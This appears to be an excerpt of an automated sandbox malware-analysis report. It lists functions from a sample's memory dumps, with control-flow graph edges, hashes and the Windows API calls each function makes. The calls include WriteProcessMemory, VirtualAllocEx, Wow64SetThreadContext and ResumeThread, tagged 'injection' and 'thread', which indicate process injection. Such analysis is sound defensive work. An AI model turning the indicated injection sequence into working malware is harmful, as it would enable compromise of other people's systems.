                                                            control_flow_graph 118 2ccb130-2ccb13f 119 2ccb16b-2ccb16f 118->119 120 2ccb141-2ccb14e call 2ccaaf4 118->120 121 2ccb171-2ccb17b 119->121 122 2ccb183-2ccb1c4 119->122 127 2ccb164 120->127 128 2ccb150 120->128 121->122 129 2ccb1c6-2ccb1ce 122->129 130 2ccb1d1-2ccb1df 122->130 127->119 174 2ccb156 call 2ccb3c8 128->174 175 2ccb156 call 2ccb3ba 128->175 129->130 131 2ccb1e1-2ccb1e6 130->131 132 2ccb203-2ccb205 130->132 135 2ccb1e8-2ccb1ef call 2ccab00 131->135 136 2ccb1f1 131->136 134 2ccb208-2ccb20f 132->134 133 2ccb15c-2ccb15e 133->127 137 2ccb2a0-2ccb360 133->137 138 2ccb21c-2ccb223 134->138 139 2ccb211-2ccb219 134->139 141 2ccb1f3-2ccb201 135->141 136->141 169 2ccb368-2ccb393 GetModuleHandleW 137->169 170 2ccb362-2ccb365 137->170 142 2ccb225-2ccb22d 138->142 143 2ccb230-2ccb239 call 2ccab10 138->143 139->138 141->134 142->143 149 2ccb23b-2ccb243 143->149 150 2ccb246-2ccb24b 143->150 149->150 151 2ccb24d-2ccb254 150->151 152 2ccb269-2ccb276 150->152 151->152 154 2ccb256-2ccb266 call 2ccab20 call 2ccab30 151->154 158 2ccb278-2ccb296 152->158 159 2ccb299-2ccb29f 152->159 154->152 158->159 171 2ccb39c-2ccb3b0 169->171 172 2ccb395-2ccb39b 169->172 170->169 172->171 174->133 175->133
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02CCB386
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 67bc3d2cc7e84591dbc59b830855cb2be9738584c3d9167c5bceb71c9e9ab804
                                                            • Instruction ID: c30983131d782f84faf2126f216574c0c6d23ad8fdb8f8a767457f0b4928034e
                                                            • Opcode Fuzzy Hash: 67bc3d2cc7e84591dbc59b830855cb2be9738584c3d9167c5bceb71c9e9ab804
                                                            • Instruction Fuzzy Hash: 85713470A00B058FD728DFAAD44575ABBF2FF88308F10892ED48AD7A40DB75E945CB90
                                                            Function 02CC44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 176 2cc44c4-2cc59d9 CreateActCtxA 179 2cc59db-2cc59e1 176->179 180 2cc59e2-2cc5a3c 176->180 179->180 187 2cc5a3e-2cc5a41 180->187 188 2cc5a4b-2cc5a4f 180->188 187->188 189 2cc5a60-2cc5a90 188->189 190 2cc5a51-2cc5a5d 188->190 194 2cc5a42-2cc5a4a 189->194 195 2cc5a92-2cc5b14 189->195 190->189 194->188 198 2cc59cf-2cc59d9 194->198 198->179 198->180
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02CC59C9
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 90c1912862467c87d0df752a5aa66e919028f5fcfea2f14734e672572f5a5430
                                                            • Instruction ID: 2eb476bb8d6fc03748badc0cbc0158f3a1be852369f4e4baf0d43b52aebe1317
                                                            • Opcode Fuzzy Hash: 90c1912862467c87d0df752a5aa66e919028f5fcfea2f14734e672572f5a5430
                                                            • Instruction Fuzzy Hash: 2141E3B1C0071DCBDB24CFAAC984B9EBBB5BF88704F60806AD508BB251DB756945CF90
                                                            Function 02CC590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 199 2cc590d-2cc59d9 CreateActCtxA 201 2cc59db-2cc59e1 199->201 202 2cc59e2-2cc5a3c 199->202 201->202 209 2cc5a3e-2cc5a41 202->209 210 2cc5a4b-2cc5a4f 202->210 209->210 211 2cc5a60-2cc5a90 210->211 212 2cc5a51-2cc5a5d 210->212 216 2cc5a42-2cc5a4a 211->216 217 2cc5a92-2cc5b14 211->217 212->211 216->210 220 2cc59cf-2cc59d9 216->220 220->201 220->202
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02CC59C9
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: a881b06588f5cfd2f878fc0818f6b6ecab61cdfa8263b5185b0002ea206359f9
                                                            • Instruction ID: 70e25ffa1351bd7b6e61b650a9f8bfbb1951b5953a6d79339386fa09f9f91323
                                                            • Opcode Fuzzy Hash: a881b06588f5cfd2f878fc0818f6b6ecab61cdfa8263b5185b0002ea206359f9
                                                            • Instruction Fuzzy Hash: 4B41F0B1C0071DCBDB24CFAAC984BDDBBB5BF88304F60806AD408AB251DB75694ACF50
                                                            Function 0750C928 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 221 750c928-750c97e 224 750c980-750c98c 221->224 225 750c98e-750c9cd WriteProcessMemory 221->225 224->225 227 750c9d6-750ca06 225->227 228 750c9cf-750c9d5 225->228 228->227
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750C9C0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 2929d5eab87ec61e7465eb6b59ea11c7cbd65e041de7c5cbd3c07ffc7fc4f87f
                                                            • Instruction ID: 8109497f20325f7d7d077ff483b77c04dd0a4345bd8238adf4f87ad28350b6b4
                                                            • Opcode Fuzzy Hash: 2929d5eab87ec61e7465eb6b59ea11c7cbd65e041de7c5cbd3c07ffc7fc4f87f
                                                            • Instruction Fuzzy Hash: C3213CB59003099FDF10CFA9C881BDEBBF5FF48310F10892AE519A7240D779A554CBA4
                                                            Function 0750C930 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 232 750c930-750c97e 234 750c980-750c98c 232->234 235 750c98e-750c9cd WriteProcessMemory 232->235 234->235 237 750c9d6-750ca06 235->237 238 750c9cf-750c9d5 235->238 238->237
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750C9C0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 48a062d586d5aa7d6e162908ad02663b5ef3ed75e02bbb5d8cf545ba0870da21
                                                            • Instruction ID: f0a55cf973a899cf93e9ddab291a2d0731bf2ada1c407a7672120d7ddb2de776
                                                            • Opcode Fuzzy Hash: 48a062d586d5aa7d6e162908ad02663b5ef3ed75e02bbb5d8cf545ba0870da21
                                                            • Instruction Fuzzy Hash: 572126B1900349DFDB10CFA9C881BDEBBF5FF48310F10882AE958A7240D778A954CBA4
                                                            Function 0750CA1A Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 242 750ca1a-750caad ReadProcessMemory 246 750cab6-750cae6 242->246 247 750caaf-750cab5 242->247 247->246
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750CAA0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 44cb69de90d8bfe8e1a590acf257f4c998e67aaa597384e2ae2a91635bdfa243
                                                            • Instruction ID: ee1e6b340e3529aa5e19b84eea57e82078d9076c23850abc2177b7ad0dfdec96
                                                            • Opcode Fuzzy Hash: 44cb69de90d8bfe8e1a590acf257f4c998e67aaa597384e2ae2a91635bdfa243
                                                            • Instruction Fuzzy Hash: 782119B19003499FDB10CFAAC841BEEBBF5FF88310F10852AE558A7240D7789510CBA5
                                                            Function 02CCCED8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 251 2ccced8-2ccd69c DuplicateHandle 253 2ccd69e-2ccd6a4 251->253 254 2ccd6a5-2ccd6c2 251->254 253->254
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CCD5CE,?,?,?,?,?), ref: 02CCD68F
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: db1ee6c13a37695b57dd8c0d0c99f6bfeb30185e8641b65ff6c95b34ff807c80
                                                            • Instruction ID: 0043feaa9e4aacb5bf177884601fc6c9a5a9ff62a59ea5def1855adde968b2ea
                                                            • Opcode Fuzzy Hash: db1ee6c13a37695b57dd8c0d0c99f6bfeb30185e8641b65ff6c95b34ff807c80
                                                            • Instruction Fuzzy Hash: 1521E5B5900209DFDB10DF9AD984ADEBBF4EB48310F24846AE919A3310D378A950CFA4
                                                            Function 02CCD600 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 257 2ccd600-2ccd606 258 2ccd608-2ccd69c DuplicateHandle 257->258 259 2ccd69e-2ccd6a4 258->259 260 2ccd6a5-2ccd6c2 258->260 259->260
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CCD5CE,?,?,?,?,?), ref: 02CCD68F
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 5daa671b31be8051021b50186dc34507878033a58e35f69029022617a27caa61
                                                            • Instruction ID: 6728ef809cf10003d33cecc3dc0b35b0f4750635a55bb4244ca9c9aed563d7c8
                                                            • Opcode Fuzzy Hash: 5daa671b31be8051021b50186dc34507878033a58e35f69029022617a27caa61
                                                            • Instruction Fuzzy Hash: C121E9B5900209DFDB10DF99D584ADEBBF4FB48710F14841AE918A7350D778A954CF64
                                                            Function 0750C790 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 263 750c790-750c7e3 265 750c7f3-750c823 Wow64SetThreadContext 263->265 266 750c7e5-750c7f1 263->266 268 750c825-750c82b 265->268 269 750c82c-750c85c 265->269 266->265 268->269
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750C816
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 92079435f272b74d8c8aa67b512e781e6002a37d3799a8825eea7b28c3819392
                                                            • Instruction ID: 96637b39ed2423adab2c9492b2a6c06d15fd433894979270f79fa963e5688039
                                                            • Opcode Fuzzy Hash: 92079435f272b74d8c8aa67b512e781e6002a37d3799a8825eea7b28c3819392
                                                            • Instruction Fuzzy Hash: FD2148B19003098FEB10CFAAC4857EEBBF4BF89320F14852AD519A7240CB789945CFA5
                                                            Function 0750C798 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 273 750c798-750c7e3 275 750c7f3-750c823 Wow64SetThreadContext 273->275 276 750c7e5-750c7f1 273->276 278 750c825-750c82b 275->278 279 750c82c-750c85c 275->279 276->275 278->279
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750C816
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 8b9865dda4f28622fdde16f42211e4ae2fffa2ee99677b1bc88eee20f63e94de
                                                            • Instruction ID: a5a3d33e121d1c484aa0a6821819c7f070e9803023de4a507c65dffc3b1d6b2f
                                                            • Opcode Fuzzy Hash: 8b9865dda4f28622fdde16f42211e4ae2fffa2ee99677b1bc88eee20f63e94de
                                                            • Instruction Fuzzy Hash: CE2139B19003099FDB10DFAAC4857EEBBF4FF88320F14842AD519A7240CB78A944CFA5
                                                            Function 0750CA20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 283 750ca20-750caad ReadProcessMemory 286 750cab6-750cae6 283->286 287 750caaf-750cab5 283->287 287->286
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750CAA0
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: d3df9d3f6d0124acf10ccfc92e9384eb64c7746e1145c2245ee5f50e53d19b15
                                                            • Instruction ID: d51b95338715810783d7d809efe50cceb1c25f34eeed60fcbee72d62032cfa31
                                                            • Opcode Fuzzy Hash: d3df9d3f6d0124acf10ccfc92e9384eb64c7746e1145c2245ee5f50e53d19b15
                                                            • Instruction Fuzzy Hash: F3212AB1800349DFDB10CF9AC841BDEBBF5FF48310F10842AE518A7240D7789510CBA5
                                                            Function 0750C868 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 291 750c868-750c8eb VirtualAllocEx 296 750c8f4-750c919 291->296 297 750c8ed-750c8f3 291->297 297->296
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750C8DE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6008776631d02cec4f46734f5dc5b4c8fdaf2d152f3d369aa62250ed3eab8bcb
                                                            • Instruction ID: d6c885a958841d2a1559d9a46e2a528b0d7f5b00cd47d3558e0667981f706860
                                                            • Opcode Fuzzy Hash: 6008776631d02cec4f46734f5dc5b4c8fdaf2d152f3d369aa62250ed3eab8bcb
                                                            • Instruction Fuzzy Hash: 522177B18003499FDF10DFA9C845BDEBFF5BF88320F14842AE514A7240CB79A840CBA4
                                                            Function 0750C870 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 301 750c870-750c8eb VirtualAllocEx 304 750c8f4-750c919 301->304 305 750c8ed-750c8f3 301->305 305->304
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750C8DE
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 20ed22c4c2142b333021101b960da6065689576165e1466e60e67b6cc19de779
                                                            • Instruction ID: 4aaa4dda507ea82a1253d69632816f50b6e79a68ca7e24c3c1c271ca3f1b352f
                                                            • Opcode Fuzzy Hash: 20ed22c4c2142b333021101b960da6065689576165e1466e60e67b6cc19de779
                                                            • Instruction Fuzzy Hash: 4A115971800349DFDB10DFAAC845BDFBBF5AF88320F108419E515A7250CB75A510CFA4
                                                            Function 0750BE71 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: dbd2c2a24638b471d5f7382e6a0f543596fbc8cc5cf28668e5887574985c07ca
                                                            • Instruction ID: 176c2249f32d63e7c5aac6f72064cdb9b8bedc7f4ae99163451c00d06d441cf9
                                                            • Opcode Fuzzy Hash: dbd2c2a24638b471d5f7382e6a0f543596fbc8cc5cf28668e5887574985c07ca
                                                            • Instruction Fuzzy Hash: 171116B1900349CFDB10DFAAC8457DEFBF5AB88724F248419D519A7240CB79A944CBA5
                                                            Function 0750BE78 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2244373810.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7500000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 722229f603504fab7eafb4fcf503b922ba0975b7315a3b0205f67a53616c47ef
                                                            • Instruction ID: 97d5440af2578d6242d12a305e7feef4d97497ec0679571778355ce2be73c792
                                                            • Opcode Fuzzy Hash: 722229f603504fab7eafb4fcf503b922ba0975b7315a3b0205f67a53616c47ef
                                                            • Instruction Fuzzy Hash: 1611F8B19003498FDB10DFAAC8457DEFBF5AF88724F248419D519A7240CB79A944CBA5
                                                            Function 0A8F02BA Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 0A8F031D
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2246154428.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_a8f0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 8df723f832328840c9a431b99a793a84d7caea368995c2bd1372a8e83e0c0b2c
                                                            • Instruction ID: 03789b2ea008f0865ba3962ed3be400393ffe1c9e1dd666e05b0a2687c892251
                                                            • Opcode Fuzzy Hash: 8df723f832328840c9a431b99a793a84d7caea368995c2bd1372a8e83e0c0b2c
                                                            • Instruction Fuzzy Hash: F3110AB5800349DFDB10DF9AD945BDEBBF4FB48720F20841AD914A7600D379A544CFA1
                                                            Function 02CCB320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02CCB386
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2236051889.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2cc0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 17a854fa7bed1b642fa6f77abc6ade6d7dfb089a763cc6d4456f57ec30c206e9
                                                            • Instruction ID: 389a01e110551978597c900c17c594fad4c5bf27cb561695fdfd8442ccf0828d
                                                            • Opcode Fuzzy Hash: 17a854fa7bed1b642fa6f77abc6ade6d7dfb089a763cc6d4456f57ec30c206e9
                                                            • Instruction Fuzzy Hash: 481102B5C003498FCB10CF9AC444B9EFBF4AB88224F24841AD818A7210C779A945CFA1
                                                            Function 0A8F02C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,?,?,?), ref: 0A8F031D
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2246154428.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_a8f0000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: fd36e9b50578f9d09148fb670a964d9197be4684b52857378884c541279a2c7e
                                                            • Instruction ID: 0e7eca8e428a28ee64b7ccc0d43d60a97a68f7458914e722b5eea544bf825962
                                                            • Opcode Fuzzy Hash: fd36e9b50578f9d09148fb670a964d9197be4684b52857378884c541279a2c7e
                                                            • Instruction Fuzzy Hash: 5011D3B5800349DFDB10DF9AD985BDEBBF8EB48320F108419DA58A7200D3B9A944CFA5
                                                            Function 0116D3D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb66f52f9315b9e394c541ee3a38b02e2b32f6ab99bbcbb79b38cfac011fc41e
                                                            • Instruction ID: fe544046e62f0118ae4d2f7e42fe79a60cba3812b5979166dcebf686b2ff58d7
                                                            • Opcode Fuzzy Hash: cb66f52f9315b9e394c541ee3a38b02e2b32f6ab99bbcbb79b38cfac011fc41e
                                                            • Instruction Fuzzy Hash: C3213871204244DFDF09DF44E5C0B66BF69FB88314F20C16CD9490B656C337E866CAA2
                                                            Function 0116D4C4 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a528a5575b60bac65584810975a2fec3c061963021ad2341b167f0de0acef44c
                                                            • Instruction ID: f79eec9d593220bbc99cc9073f9f6cd91661a48faf0cbb09c9ad79fbf9094336
                                                            • Opcode Fuzzy Hash: a528a5575b60bac65584810975a2fec3c061963021ad2341b167f0de0acef44c
                                                            • Instruction Fuzzy Hash: 23213672600240DFDF09DF54E9C0B26BF79FB88318F20C169D9490B656C337D426CAA2
                                                            Function 02A2D1D4 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7197a52beba01383ba8e290f86e964bee5e586a1ee415417c8aee050d83057ed
                                                            • Instruction ID: 3caf02508f0b4a87d0cff386d5bc9b6417b10343a421dd96d78795740be9aad7
                                                            • Opcode Fuzzy Hash: 7197a52beba01383ba8e290f86e964bee5e586a1ee415417c8aee050d83057ed
                                                            • Instruction Fuzzy Hash: 3A2104B5504614EFDB05DF18D9C0B26FBA5FB88314F20C56DE90A4B253CB76D44ACB61
                                                            Function 02A2D01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a69959409bff18b29a796a910960ce48d0ac61f34c9944c4c9c1de58c7e9a085
                                                            • Instruction ID: 5b4c54e9cbdba73a30df6242e47149891c75f659040eeba62cca3513255b28ec
                                                            • Opcode Fuzzy Hash: a69959409bff18b29a796a910960ce48d0ac61f34c9944c4c9c1de58c7e9a085
                                                            • Instruction Fuzzy Hash: 53212275608640EFDB14DF18D9C0B26BB61FB84314F20C56DD90B0B2A7CB7AD80BCA61
                                                            Function 02A2D007 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22363bb4ac21bc9e036a8d774d54365efd5b2241752ea9dcb400cdcd7c236f89
                                                            • Instruction ID: 79aa1d66b1398229d690ac34e54348cd8815e51c081df80501c1da3890d9da93
                                                            • Opcode Fuzzy Hash: 22363bb4ac21bc9e036a8d774d54365efd5b2241752ea9dcb400cdcd7c236f89
                                                            • Instruction Fuzzy Hash: F0214C755097808FCB12CF24D9D4715BF71EB46214F28C5DAD8898B6A7C33A980ACB62
                                                            Function 0116D3D3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
